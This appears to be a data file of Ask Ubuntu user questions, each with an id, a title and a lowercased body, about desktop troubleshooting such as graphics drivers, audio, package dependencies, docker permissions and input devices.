414146	ubuntu 13.10 graphical issues	i installed my new graphic drivers via the terminal and reset the computer for the install to finish . when i tried to boot ubuntu i just get a purple screen that is half the size of my screen then a black screen that i can move my mouse around in . i if i click a few times my cursor changes to a black x with a white outline that i can move around the whole screen but that 's about it . i can get into tty6 and play around with the terminal i was able to try and reinstall ubuntu via here and check everything was up to date but alas this has n't fixed it . any ideas on how to get me back into a ubuntu gui . many thanks
414149	docker commands related problem	i tried : : ~ $ docker -d [ /var/lib/docker|99d07396 ] +job initapi ( ) [ /var/lib/docker|99d07396.initapi ( ) ] creating server mkdir /var/lib/docker/containers : permission denied [ /var/lib/docker|99d07396 ] -job initapi ( ) = err ( 1 ) 2014/02/01 20:38:13 initapi : mkdir /var/lib/docker/containers : permission denied tail -f /var/log/kern.log : feb 2 21:44:18 neethu-pc kernel : [ 6211.765815 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) feb 2 21:44:18 neethu-pc kernel : [ 6211.765818 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) feb 2 21:44:18 neethu-pc kernel : [ 6211.765822 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) feb 2 21:44:18 neethu-pc kernel : [ 6211.765826 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) feb 2 21:44:19 neethu-pc kernel : [ 6212.855662 ] wlan0 : authenticate with 00:1e : a6:1c:4b : a0 feb 2 21:44:19 neethu-pc kernel : [ 6212.863401 ] wlan0 : send auth to 00:1e : a6:1c:4b : a0 ( try 1/3 ) feb 2 21:44:19 neethu-pc kernel : [ 6212.865598 ] wlan0 : authenticated feb 2 21:44:19 neethu-pc kernel : [ 6212.866094 ] wlan0 : associate with 00:1e : a6:1c:4b : a0 ( try 1/3 ) feb 2 21:44:19 neethu-pc kernel : [ 6212.869620 ] wlan0 : rx assocresp from 00:1e : a6:1c:4b : a0 ( capab=0x411 status=0 aid=2 ) feb 2 21:44:19 neethu-pc kernel : [ 6212.869702 ] wlan0 : associated sudo docker -d : [ /var/lib/docker|99d07396 ] +job initapi ( ) [ /var/lib/docker|99d07396.initapi ( ) ] creating server mkdir /var/lib/docker/containers : permission denied [ /var/lib/docker|99d07396 ] -job initapi ( ) = err ( 1 ) 2014/02/01 20:38:13 initapi : mkdir /var/lib/docker/containers : permission denied how can i solve this ?
414158	rhythmbox plugins menu	i have just installed rhythmbox via the software centre ( 2.99.1 ) but either for love nor money does my ui look like the images in the screenshots ; i 'm trying to hook up to my dlna nas . i have the grilo 0.2 plugin installed ( also via software centre ) but the edit menu in rhythmbox does not contain an entry for `` plug-ins '' . from what i have read i need to enable the plug-in , but have no idea how to get to the configuration screen . assistance greatly appreciated . thanks paul
414159	window tansparency - set for one window only	i 'm running xubuntu 13.10 and have set inactive windows to be transparent . however , is there a way to prevent one window/program ( i.e . tvtime ) from becoming transparent . see this screenshot
414165	java error for crawlers using nutch	i tried to crawl my url but i get this error rshu @ ubuntu : ~/documents/apache-nutch-2.2.1 $ cd src rshu @ ubuntu : ~/documents/apache-nutch-2.2.1/src $ bin/nutch inject urls bin/nutch : line 243 : /usr/lib/jvm/jdk1.7.0/bin/java : no such file or directory
414166	ca n't get microphone to produce anything but silence or feedback noise	i just got a lapel microphone , cheap but got good reviews on amazon . i do n't think it 's the hardware that matters as such . in fact , some of the mic settings i have tried almost worked but then they got screwed up when i changed something or other . anyway it 's not a usb mic , but one that goes into the circular jack next to the one for headphones . pavucontrol has three levels related to the mic : `` microphone '' , `` front microphone '' and `` line in '' . all of these have a mute toggle and a toggle labeled `` set as fallback '' . i have no idea what that is . the `` base '' point on all these intervals is -52.50 db . messing with any of these settings tends to result in highly discrete behavior : either i get nothing or a shrill , monotonous whine that basically wipes out any signal . what should i do ?
414167	how to install ubuntu with only core packages ?	i would like to install ubuntu on my laptop and have set up the necessary partitions like this : / efi system partition /var /home to create the efi system partition , i made a 512 mb fat32 partition in gparted and flagged it with boot . if more is necessary please let me know . as for my question , i would like to install ubuntu with only the necessary packages for having a usable system , such as apt-get . the reason for this is that i want to install only the xmonad window manager for my desktop . is it possible to do this ? how could i do it ? thanks for your help .
414168	how to get latest wordpress on 12.04.4 lts	i have a server running ubuntu 12.04.4 x64 , and want to install latest wordpress . i have two options use apt-get to install the package ( sudo apt-get install wordpress ) install the latest version from wordress.org ( wget http : //wordpress.org/latest.tar.gz ) what are the pros and cons of each method ? i found through launchpad that the version for precise pangolin is 3.3.1+dfsg-1 . which i assume should be upgradeable through wordpress admin page to latest version ( 3.8.1 as of this writing ) . so which method is better to install latest wordpress . btw , i do have webmin/virtualmin running on my server . cheers , abdul
414169	13.10 - pulseaudio puts audio into hdmi , but no sound out of tv	basically , no sound is coming out the television . i 'm running out of idea of why ? viewing the pulseaudio control panel , it 's putting sound out the hdmi alsamixer is not mute the television is not mute . i booted into windows and the audio out the hdmi works fine . debugging info : basics xubuntu 13.10 linux desktop 3.11.0-15-generic # 25-ubuntu smp ati 4870 lshw -c video description : vga compatible controller product : rv770 [ radeon hd 4870 ] vendor : advanced micro devices , inc. [ amd/ati ] physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : vga_controller bus_master cap_list rom configuration : driver=radeon latency=0 resources : irq:44 memory : d0000000-dfffffff memory : feae0000-feaeffff ioport : c000 ( size=256 ) memory : feac0000-feadffff aplay -l **** list of playback hardware devices **** card 0 : sb [ hda ati sb ] , device 0 : alc887-vd analog [ alc887-vd analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 0 : sb [ hda ati sb ] , device 1 : alc887-vd digital [ alc887-vd digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : hdmi [ hda ati hdmi ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 0/1 subdevice # 0 : subdevice # 0 sudo speaker-test -c 2 -r 48000 -d hw:1,3 speaker-test 1.0.27.1 playback device is hw:1,3 stream parameters are 48000hz , s16_le , 2 channels using 16 octaves of pink noise playback open error : -16 , device or resource busy
414170	is there a way to use english im with hints while using the german keyboard in fcitx ?	i 'm using fcitx instead of ibus , because ibus was a bit buggy . ( not starting up or not showing installed im 's etc . ) while the german mode is completely fine and for pinyin or japanese im 's there are options to set the keyboard layout to the german one ( qwertz ) . however , i ca n't find any similar way to set the builtin english im to the german keyboard layout . this is a problem when i want to make use of the hint function ( auto completion ) , using the english dictionary , because , naturally , the built-in german im uses only a german dictionary . thanks !
414171	installing ubuntu sdk error	i was trying to install ubuntu sdk . at first i tried : sudo add-apt-repository ppa : ubuntu-sdk-team/ppa sudo apt-get update sudo apt-get dist-upgrade sudo apt-get install ubuntu-sdk and it says : the following packages have unmet dependencies : ubuntu-sdk : depends : qtcreator-plugin-ubuntu but it is not going to be installed recommends : ubuntu-html5-container-examples but it is not installable e : unable to correct problems , you have held broken packages . then i tried sudo apt-get update sudo apt-get install ubuntu-sdk and sudo apt-get install ubuntu-sdk qtcreator-plugin-ubuntu-cordova cordova-ubuntu-2.8 cordova-ubuntu-2.8-dev qtcreator-plugin-ubuntu qtcreator-plugin-ubuntu-cordova-common and i get the same error . also have tried : sudo apt-get update sudo apt-get install ubuntu-touch-meta qtcreator qtcreator-plugin-ubuntu-common and got : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package ubuntu-touch-meta i have also run sudo add apt-repository ppa/ubuntu-sdk-team/ppa and i get sudo : add : command not found what should i do ?
414173	external ( encrypted ) hard drive shows all space unallocated	i bought a new usb hard drive , formatted it using ubuntu disks tool and also encrypted the drive with it ( i think i used the luks+ext4 option ) . now that i try to use the drive with my other ubuntu computer , it shows up completely empty . it does n't show up in the file manager at all and gparted shows all the space on the drive as `` unallocated '' . what happened here ? is there any chance that i can still recover the data i stored on the hard drive ?
414174	does cut and paste work in terminal ?	does cut & paste work in terminal ? as in ctrl+c and ctrl+v ?
414178	undo boot repair	now that i want to uninstall ubuntu , do i need to revert boot repair 's actions in someway because that was needed to get windows 8 booting in uefi mode in grub in the end i 'm deleting my linux partitions and want to re-install the windows 8 bootloader .
414181	how to patch wine and use it in playonlinux	i have wine installed with a ppa on my system and i do not want to change it . what i want to do is to apply a patch to ( this one ) and use it in playonlinux . i know i can use custom wine versions in playonlinux , a nice person long time ago send me a patched wine that i placed in playonlinux wine folder and it used to work . so can some one help me with this ? ? thank you in advanced
414182	ms-dos emulator	i have to use diagnostic tool for hdd that is runing on ms-dos system . by dosemu program itself started and work but do n't find hdd in system . my question : is it possible to make it see second ata hdd . and what about dos in box ? may be it will do it ? it for my friends and must be done yesterday . so , please help me . thank 's .
414183	nvidia drivers with ubuntu 12.04	it 's hard to believe how many postings you can find when searching the internet on nvidia with ubuntu problems , yet here goes one more : i have a nvidia geforce gt 430 video card and a 32bit amd machine . i 'm dual booting windows 7 with ubuntu 12.04 lts . i 've tried many different ways of installing both the nvidia proprietary and ubuntu packaged drivers as suggested by many different postings . when things do n't work , i get a black screen , or a screen with the default gui background with no icons . more often than not , the driver ( both nvidia and nouveau ? ) installation does appear to work . what happens is i get a nice hi-res view of the desktop , much better resolution than what i see when using the live cd . some apps work perfectly ( dash , home , firefox , and all of the libre apps ) . other apps ( system settings , appearance , software center etc . ) , an icon appears in the launcher with a `` > '' within or next to the icon . when you point to that icon , it wiggles , but that 's about it . no error message , and no app appears . i 've spent hours trying to get this to work , and i do n't give up easily , and i 'm looking for suggestions that will get all functions working . thanks in advance .
414186	how to configure scanimage to produce pdfs as small as gscan2pdf 's ?	i use gscan2pdf every month , mostly to scan bills . i keep each vendor 's bills in a separate directory . i could save myself some time if gscan2pdf were to make an educated guess at what directory an image belongs in . since it does n't do that , i wrote a script that uses scanimage , tesseract , convert , and grep to scan in the image , extract the text , pattern-match the text , and map that match to a directory name . it works great except that producing an image with scanimage and then converting that image to a pdf consistently produces a pdf that 's twice as big as what gscan2pdf produces . as far as i can tell , gscan2pdf uses scanimage internally , but i 'm not very good at reading perl code . tl ; dr : how can i configure scanimage to produce pdfs as small as gscan2pdf 's ? version information : ubuntu 13.04 gscan2pdf 1.2.2 scanimage ( sane-backends ) 1.0.23 ; backend version 1.0.23 convert version : imagemagick 6.7.7-10 2013-09-10 q16 http : //www.imagemagick.org ; features : openmp the typical document is an 8.5 x 11 bill , white background with some kind of logo up top , and black text . i 've tried various scan resolutions ( 100dpi , 200dpi , 400dpi ) and both scanimage formats ( ppm and tiff ) . here is the part of the script that scans and converts ( i omitted the text extraction and pattern-matching part ) : # ! /bin/bash rm -f /tmp/scanned* /tmp/united.pdf echo -n `` scanning ... '' scanimage -- batch=/tmp/scanned % d.ppm -- format=ppm 2 > /tmp/scanned.err # pdfs are way too big if you convert from ppm , so convert ppm - > jpg first echo -n `` converting to pdf ... '' for file in /tmp/scanned*.ppm ; do convert $ file $ file.jpg 2 > > /tmp/scanned.err convert $ file.jpg $ file.jpg.pdf 2 > > /tmp/scanned.err done # pdfunite does n't work with single pdf echo -n `` concatenating pages ... '' count= $ ( ls -1 /tmp/scanned*.pdf|wc -w ) if [ $ count -eq 1 ] ; then cp /tmp/scanned*.pdf /tmp/united.pdf else pdfunite /tmp/scanned*.pdf /tmp/united.pdf fi
414188	totem 3.6 in ubuntu 12.04 ?	can i upgrade totem to version 3.6.3 in ubuntu 12.04 without the webupd8 ppa . i tried the process from here , but i have some problems with getting the dependencies . the reason why i want totem 3.6.3 is of course for the latest changes and speed improvements . the solution by wilf does n't work ! this is what happened when i followed the procedure : david @ david-virtualbox : ~ $ wget http : //launchpadlibrarian.net/136994659/totem_3.6.3-0ubuntu6_amd64.deb -- 2014-02-01 14:54:55 -- http : //launchpadlibrarian.net/136994659/totem_3.6.3-0ubuntu6_amd64.deb resolving launchpadlibrarian.net ( launchpadlibrarian.net ) ... 91.189.89.229 , 91.189.89.228 connecting to launchpadlibrarian.net ( launchpadlibrarian.net ) |91.189.89.229|:80 ... connected . http request sent , awaiting response ... 200 ok length : 104032 ( 102k ) [ application/x-debian-package ] saving to : `totem_3.6.3-0ubuntu6_amd64.deb' 100 % [ ====================================== > ] 104,032 -- .-k/s in 0.005s 2014-02-01 14:54:56 ( 18.2 mb/s ) - `totem_3.6.3-0ubuntu6_amd64.deb' saved [ 104032/104032 ] david @ david-virtualbox : ~ $ sudo dpkg -i totem_3.6.3-0ubuntu6_amd64.deb [ sudo ] password for david : ( reading database ... 238277 files and directories currently installed . ) preparing to replace totem 3.4.3-0ubuntu1~precise1 ( using totem_3.6.3-0ubuntu6_amd64.deb ) ... unpacking replacement totem ... dpkg : dependency problems prevent configuration of totem : totem depends on libcogl12 ( > = 1.7.4 ) ; however : package libcogl12 is not installed . totem depends on libtotem0 ( > = 3.6.3-0ubuntu6 ) ; however : version of libtotem0 on system is 3.4.3-0ubuntu1~precise1 . totem depends on gstreamer1.0-clutter ; however : package gstreamer1.0-clutter is not installed . totem depends on gstreamer1.0-plugins-base ( > = 0.11.93 ) ; however : package gstreamer1.0-plugins-base is not installed . totem depends on gstreamer1.0-plugins-good ( > = 0.11.93 ) ; however : package gstreamer1.0-plugins-good is not installed . totem depends on gstreamer1.0-x ; however : package gstreamer1.0-x is not installed . totem depends on totem-common ( = 3.6.3-0ubuntu6 ) ; however : version of totem-common on system is 3.4.3-0ubuntu1~precise1 . dpkg : error processing totem ( -- install ) : dependency problems - leaving unconfigured processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... errors were encountered while processing : totem and i get errors from the sudo apt-get build-dep totem david @ david-virtualbox : ~/downloads $ sudo apt-get build-dep totem reading package lists ... done building dependency tree reading state information ... done the following packages have unmet dependencies : librsvg2-dev : depends : librsvg2-2 ( = 2.36.1-0ubuntu1 ) but 2.36.3-0ubuntu1~precise1 is to be installed libtotem-plparser-dev : depends : libtotem-plparser17 ( = 3.4.1-1 ) but 4.2-1~precise1 is to be installed depends : gir1.2-totem-plparser-1.0 ( = 3.4.1-1 ) but 3.4.2-1~precise1 is to be installed e : build-dependencies for totem could not be satisfied . david @ david- virtualbox : ~/downloads $ i seem to get errors from installing the depedencies that wilf suggested , i did uninstall them before installing the newer version . here is what i got in the terminal : david @ david-virtualbox : ~ $ cd ~/downloads/ david @ david-virtualbox : ~/downloads $ sudo dpkg -i totem-common_3.6.3-0ubuntu6_all.deb [ sudo ] password for david : selecting previously unselected package totem-common . ( reading database ... 269477 files and directories currently installed . ) unpacking totem-common ( from totem-common_3.6.3-0ubuntu6_all.deb ) ... setting up totem-common ( 3.6.3-0ubuntu6 ) ... processing triggers for man-db ... processing triggers for gconf2 ... processing triggers for hicolor-icon-theme ... processing triggers for libglib2.0-0 ... david @ david-virtualbox : ~/downloads $ sudo dpkg -i libtotem0_3.6.3-0ubuntu6_amd64.deb selecting previously unselected package libtotem0 . ( reading database ... 269887 files and directories currently installed . ) unpacking libtotem0 ( from libtotem0_3.6.3-0ubuntu6_amd64.deb ) ... dpkg : dependency problems prevent configuration of libtotem0 : libtotem0 depends on libcogl12 ( > = 1.7.4 ) ; however : package libcogl12 is not installed . libtotem0 depends on libglib2.0-0 ( > = 2.35.9 ) ; however : version of libglib2.0-0 on system is 2.34.1-0ubuntu1~12.04~ricotz0 . dpkg : error processing libtotem0 ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : libtotem0 david @ david-virtualbox : ~/downloads $ sudo dpkg -i libcogl12_1.14.0-0ubuntu1_amd64.deb selecting previously unselected package libcogl12 . ( reading database ... 269896 files and directories currently installed . ) unpacking libcogl12 ( from libcogl12_1.14.0-0ubuntu1_amd64.deb ) ... dpkg : dependency problems prevent configuration of libcogl12 : libcogl12 depends on libc6 ( > = 2.17 ) ; however : version of libc6 on system is 2.15-0ubuntu10.5 . libcogl12 depends on libegl1-mesa ( > = 7.8.1 ) | libegl1-x11 ; however : package libegl1-mesa is not installed . package libegl1-x11 is not installed . dpkg : error processing libcogl12 ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : libcogl12 looks like i 'm missing some dep 's , and the libglib2.0-0 on my system ( 2.34.1 ) is newer than what is on the raring page ( 2.33.14 ) and it says i need 2.35.9 , looks like i have to dig in saucy 's or trusty 's page for libglib2.0-0 v.2.35 . ok i checked , saucy is using just the exact same version of libglib2.0-0 as raring as its still 2.33.14 . however trusty is using 2.39.3 , and i 'm using 2.34.1 , so what should i use ? edit ignore what i said like they put the wrong version number in the description but when you go on the page it 's actually 2.36.0 for raring , 2.38.0 for saucy , and 2.39.3 for trusty . so should i just go with 2.36.0 or should i get 2.35.9 ? would n't 2.36.0 work as well ? i 'm going to go with v.2.35.9 found here . ok , all these dependencies are leading to more dependencies , and it looks like an infinite loop , and synaptic ca n't remove the broken packages anymore ! i 'll start with a backup of my virtual machine before i started upgrading totem again then i can be assisted again . gdebi seems not to like totem 3.6.3 ether because of the mozilla-totem plugin . david @ david-virtualbox : ~/downloads $ sudo apt-get install gdebi-core [ sudo ] password for david : reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : indicator-printers gir1.2-timezonemap-1.0 libdiscid0 unity-lens-video linux-headers-3.2.0-56 unity-scope-video-remote gir1.2-json-1.0 librhythmbox-core5 libpcrecpp0 linux-headers-3.2.0-56-generic language-pack-kde-en kde-l10n-engb libcmis-0.2-0 libmusicbrainz3-6 libpcre3-dev language-pack-kde-en-base gir1.2-xkl-1.0 use 'apt-get autoremove ' to remove them . the following new packages will be installed : gdebi-core 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 159 kb of archives . after this operation , 1,198 kb of additional disk space will be used . get:1 http : //ca.archive.ubuntu.com/ubuntu/ precise/universe gdebi-core all 0.8.5build1 [ 159 kb ] fetched 159 kb in 1s ( 139 kb/s ) selecting previously unselected package gdebi-core . ( reading database ... 238277 files and directories currently installed . ) unpacking gdebi-core ( from ... /gdebi-core_0.8.5build1_all.deb ) ... processing triggers for man-db ... setting up gdebi-core ( 0.8.5build1 ) ... david @ david-virtualbox : ~/downloads $ sudo gdebi totem_3.6.3-0ubuntu6_amd64.deb reading package lists ... done building dependency tree reading state information ... done building data structures ... done building data structures ... done this package is uninstallable breaks existing package 'totem-mozilla ' dependency totem ( = 3.4.3-0ubuntu1~precise1 ) david @ david-virtualbox : ~/downloads $ and when i install totem-mozilla 3.6.3 : david @ david-virtualbox : ~/downloads $ sudo gdebi totem-mozilla_3.6.3-0ubuntu6_amd64.deb reading package lists ... done building dependency tree reading state information ... done building data structures ... done building data structures ... done this package is uninstallable dependency is not satisfiable : totem ( = 3.6.3-0ubuntu6 ) ok so how do i install totem 3.6 + all the dependencies needed without breaking any packages ?
414189	how to control remotely my android ?	i had a windows os earlier and could use teamviewer to connect to my samsung phone and execute actions . however that was not only very slow but also very slow in response . is there any other way to sort of open a rdp session to the phone from my ubuntu 13.10 ?
414191	ubuntu freezes when i go to files	when i click on files in the file application the computer completely freezes . anything to do with download files or system files , anything it just freezes . i 'm not sure what it is called in ubuntu but if i was in windows it 's every time i go into the windows explorer . i have made sure everything is up to date and checked my system log via the kernel ( ca n't do it via files as crashes ) but nothing has come up . it 's ubuntu 13.10 i7 2600k 8gb ddr3 at 1300mhz 2.0 tb hdd with a nvidia geforce gtx 590 . the hdd light does n't flash when it crashes and no fans ramp up so no more strain is put on the machine . edit it 's the same with anything that runs of ubuntu except firefox and the terminal . for example going into the software centre will cause a complete freeze
414193	if possible , how to upgrade to ubuntu 13.10 while keeping kernel 3.2 from 12.04 ?	to expand my question , i would like to know how to upgrade ubuntu 12 . 04 . 0 ( kernel version 3 . 2 , compatible with the intel gma3600 driver provided with the package cedarview-drm ) to ubuntu 13 . 10 , keeping the 3 . 2 kernel version for 2d acceleration purposes , and having the latest stable kernel alongside . of course , all this if it is possible . hardware here is acer aspire one d270 , intel atom processor with intel gma3600 ( as mentioned , best driver option for this one is cedarview-drm , although gma500_gfx does give basic functions ) .
414197	dual 2560x1440 resolution problem	i have 2 2560x1440 displays ( hp zr2740w ) , and a geforce gt610 card with two dual dvi outputs and 1gb of ram . i can get full resolution on either screen and 1/4 on the other but not full resolution on both . when i use nvidia-settings , the problem appears to trace down to `` connection link : single '' on the second dvi port ( dfp-1 ) . i 've experimented with swapping connections at the card , which results in swapping which monitor has full resolution . consequently , the problem can not be in the monitor or in the dvi cable . is this a case of `` you lose because your video card does n't truly support two dual dvi connections '' ? or am i missing something ? i 'm posting outputs of various diagnostics below . -john 2:33pm humpty-6 : xrandr screen 0 : minimum 8 x 8 , current 3280 x 1440 , maximum 16384 x 16384 dvi-i-0 disconnected ( normal left inverted right x axis y axis ) dvi-i-1 disconnected ( normal left inverted right x axis y axis ) dvi-i-2 connected 2560x1440+0+0 ( normal left inverted right x axis y axis ) 597mm x 336mm 2560x1440 60.0*+ 1280x720 59.9 dvi-i-3 connected 720x1280+2560+160 left ( normal left inverted right x axis y axis ) 597mm x 336mm 1280x720 59.9*+ hdmi-0 disconnected ( normal left inverted right x axis y axis ) portions of /var/log/xorg.0.log [ 10.041 ] ( ii ) nvidia glx module 304.116 mon oct 28 20:59:08 pdt 2013 [ 10.041 ] loading extension glx [ 10.041 ] ( == ) matched nvidia as autoconfigured driver 0 [ 10.041 ] ( == ) matched nouveau as autoconfigured driver 1 [ 10.041 ] ( ii ) loadmodule : `` nvidia '' [ 10.041 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/nvidia_drv.so [ 10.057 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 10.072 ] ( ii ) nvidia dlloader x driver 304.116 mon oct 28 20:40:38 pdt 2013 [ 10.072 ] ( ii ) nvidia unified driver for all supported nvidia gpus [ 10.086 ] ( ii ) nvidia ( 0 ) : creating default display subsection in screen section `` default screen section '' for depth/fbbpp 24/32 [ 10.086 ] ( == ) nvidia ( 0 ) : depth 24 , ( == ) framebuffer bpp 32 [ 10.086 ] ( == ) nvidia ( 0 ) : rgb weight 888 [ 10.086 ] ( == ) nvidia ( 0 ) : default visual is truecolor [ 10.086 ] ( == ) nvidia ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) [ 10.086 ] ( ** ) nvidia ( 0 ) : option `` nologo '' `` true '' [ 10.086 ] ( ** ) nvidia ( 0 ) : enabling 2d acceleration [ 10.970 ] ( ii ) nvidia ( gpu-0 ) : display ( hp zr2740w ( dfp-0 ) ) does not support nvidia 3d vision [ 10.970 ] ( ii ) nvidia ( gpu-0 ) : stereo . [ 10.981 ] ( ii ) nvidia ( gpu-0 ) : display ( hp zr2740w ( dfp-1 ) ) does not support nvidia 3d vision [ 10.981 ] ( ii ) nvidia ( gpu-0 ) : stereo . [ 10.983 ] ( ii ) nvidia ( 0 ) : nvidia gpu geforce gt 610 ( gf119 ) at pci:7:0:0 ( gpu-0 ) [ 10.983 ] ( -- ) nvidia ( 0 ) : memory : 1048576 kbytes [ 10.983 ] ( -- ) nvidia ( 0 ) : videobios : 75.19.55.00.12 [ 10.983 ] ( ii ) nvidia ( 0 ) : detected pci express link width : 16x [ 10.983 ] ( -- ) nvidia ( 0 ) : interlaced video modes are supported on this gpu [ 10.989 ] ( -- ) nvidia ( 0 ) : valid display device ( s ) on geforce gt 610 at pci:7:0:0 [ 10.989 ] ( -- ) nvidia ( 0 ) : crt-0 [ 10.989 ] ( -- ) nvidia ( 0 ) : crt-1 [ 10.989 ] ( -- ) nvidia ( 0 ) : hp zr2740w ( dfp-0 ) ( connected ) [ 10.989 ] ( -- ) nvidia ( 0 ) : hp zr2740w ( dfp-1 ) ( connected ) [ 10.989 ] ( -- ) nvidia ( 0 ) : dfp-2 [ 10.989 ] ( -- ) nvidia ( 0 ) : crt-0 : 400.0 mhz maximum pixel clock [ 10.989 ] ( -- ) nvidia ( 0 ) : crt-1 : 400.0 mhz maximum pixel clock [ 10.989 ] ( -- ) nvidia ( 0 ) : hp zr2740w ( dfp-0 ) : 330.0 mhz maximum pixel clock [ 10.989 ] ( -- ) nvidia ( 0 ) : hp zr2740w ( dfp-0 ) : internal dual link tmds [ 10.989 ] ( -- ) nvidia ( 0 ) : hp zr2740w ( dfp-1 ) : 165.0 mhz maximum pixel clock [ 10.989 ] ( -- ) nvidia ( 0 ) : hp zr2740w ( dfp-1 ) : internal single link tmds [ 10.989 ] ( -- ) nvidia ( 0 ) : dfp-2 : 165.0 mhz maximum pixel clock [ 10.989 ] ( -- ) nvidia ( 0 ) : dfp-2 : internal single link tmds [ 10.989 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 10.989 ] ( ** ) nvidia ( 0 ) : device hp zr2740w ( dfp-0 ) ( using edid frequencies has been [ 10.989 ] ( ** ) nvidia ( 0 ) : enabled on all display devices . ) [ 10.989 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 10.989 ] ( ** ) nvidia ( 0 ) : device hp zr2740w ( dfp-1 ) ( using edid frequencies has been [ 10.989 ] ( ** ) nvidia ( 0 ) : enabled on all display devices . ) [ 10.989 ] ( == ) nvidia ( 0 ) : [ 10.989 ] ( == ) nvidia ( 0 ) : no modes were requested ; the default mode `` nvidia-auto-select '' [ 10.989 ] ( == ) nvidia ( 0 ) : will be used as the requested mode . [ 10.989 ] ( == ) nvidia ( 0 ) : [ 10.989 ] ( ii ) nvidia ( 0 ) : validated metamodes : [ 10.989 ] ( ii ) nvidia ( 0 ) : `` dfp-0 : nvidia-auto-select , dfp-1 : nvidia-auto-select '' [ 10.989 ] ( ii ) nvidia ( 0 ) : virtual screen size determined to be 3840 x 1440 [ 11.024 ] ( -- ) nvidia ( 0 ) : dpi set to ( 108 , 107 ) ; computed from `` useediddpi '' x config [ 11.024 ] ( -- ) nvidia ( 0 ) : option [ 11.025 ] ( -- ) depth 24 pixmap format is 32 bpp [ 11.025 ] ( ii ) nvidia : using 3072.00 mb of virtual memory for indirect memory [ 11.025 ] ( ii ) nvidia : access . [ 11.033 ] ( ii ) nvidia ( 0 ) : setting mode `` dfp-0 : nvidia-auto-select , dfp-1 : nvidia-auto-select '' [ 11.076 ] loading extension nv-glx [ 11.127 ] ( == ) nvidia ( 0 ) : disabling shared memory pixmaps [ 11.127 ] ( == ) nvidia ( 0 ) : backing store disabled [ 11.127 ] ( == ) nvidia ( 0 ) : silken mouse enabled [ 11.128 ] ( == ) nvidia ( 0 ) : dpms enabled [ 11.128 ] loading extension nv-control [ 11.129 ] loading extension xinerama [ 11.129 ] ( ii ) loading sub module `` dri2 '' [ 11.129 ] ( ii ) loadmodule : `` dri2 '' [ 11.129 ] ( ii ) module `` dri2 '' already built-in [ 11.129 ] ( ii ) nvidia ( 0 ) : [ dri2 ] setup complete [ 11.129 ] ( ii ) nvidia ( 0 ) : [ dri2 ] vdpau driver : nvidia [ 11.129 ] ( -- ) randr disabled
414201	help ! the system is running in low-graphics mode	i 'm using ubuntu 13.10 on a acer extensa 7620g . today when i was trying to start my computer , i received this message . i 've tried to fix it following the methods adviced but they does n't work for me . please , i need some help .
414206	not able to locate package indicator-ubuntuone after installation	people i tried to install the app indicator for ubuntuone ( as described here : how to add ubuntu one icon as an indicator ? ) , by adding the suggested ppa and the apt-get install command . it installed without problems . but when i try to launch the indicator it seems unable to find the package . i 've tried different word order , different spelling and i 've tried simply searching for it in synaptic , but there 's no trace of it . however , when i do another `` apt-get install indicator-ubuntuone '' , it returns `` indicator-ubuntu is already the newest version . '' any help would be greatly appreciated . cheers , marty i 'm running 12.04 , by the way .
414207	which package to install to use c/c++ compiler with eclipse	i want to develop c/c++ applications using eclipse : should i install using sudo apt-get install build-essential or sudo apt-get install gcc
414210	error installing copy.com client	i 'm trying to install copy.com 's client on ubuntu 13.10 but when i do , i get the following error message : gtk-message : failed to load module `` canberra-gtk-module '' ( copyagent:4430 ) : libdbusmenu-gtk-critical ** : watch_submenu : assertion 'gtk_is_menu_shell ( menu ) ' failed from there , it initially appears that the copy client installs correctly . i am prompted to login and their icon shows up in the task bar . however , sync does not work properly . items placed in my copy folder on other devices ( or through the web interface ) sometimes download to this machine , and sometimes do n't . i have investigated the first error message and found this solution , that i should insall the libcanberra-gtk-module . but when trying to install it , it is already installed . just to be sure , i reinstalled it but it seems to have had no effect . i attempted to investigate the second error message and found that lots of different programs give similar error messages , but all of the solutions i could find seemed to be specific to the program that was under discussion on that particular thread . any thoughts on how i could solve this ? or at least what i can try next ?
414212	how can i delete files and folders which are in another partition with del key ?	i am not able to delete files by pressing the del key once in my data partition . however , i can do it with files in my home folder . i 'm using ubuntu gnome 13.10 . it 's a ntfs partition with rw permissions .
414214	how to make a trackpoint pointing stick with clickpad behave as a scroll wheel	i am trying very hard to enable scroll wheel emulation using the trackpoint when button 2 of a clickpad is pressed . when i use a trackpoint with dedicated buttons ( by this i mean pressing dedicated trackpoint button 2 and moving the trackpoint up or down ) , the xev output indicates that button 4 is recognised as a scroll up operation and button 5 is recognised as a scroll down operation . the xev output for the scroll wheel of a typical mouse indicates the same . however , when i use a trackpoint with a clickpad ( on a thinkpad yoga ) , the buttons 4 and 5 are not registered , with instead button 2 showing up in isolation . how can i get the button 2-trackpoint motion combination to exhibit the scrolling behaviour ? ! there seems to be some interesting information on this problem here , but i have no idea how to implement this stuff in ubuntu .
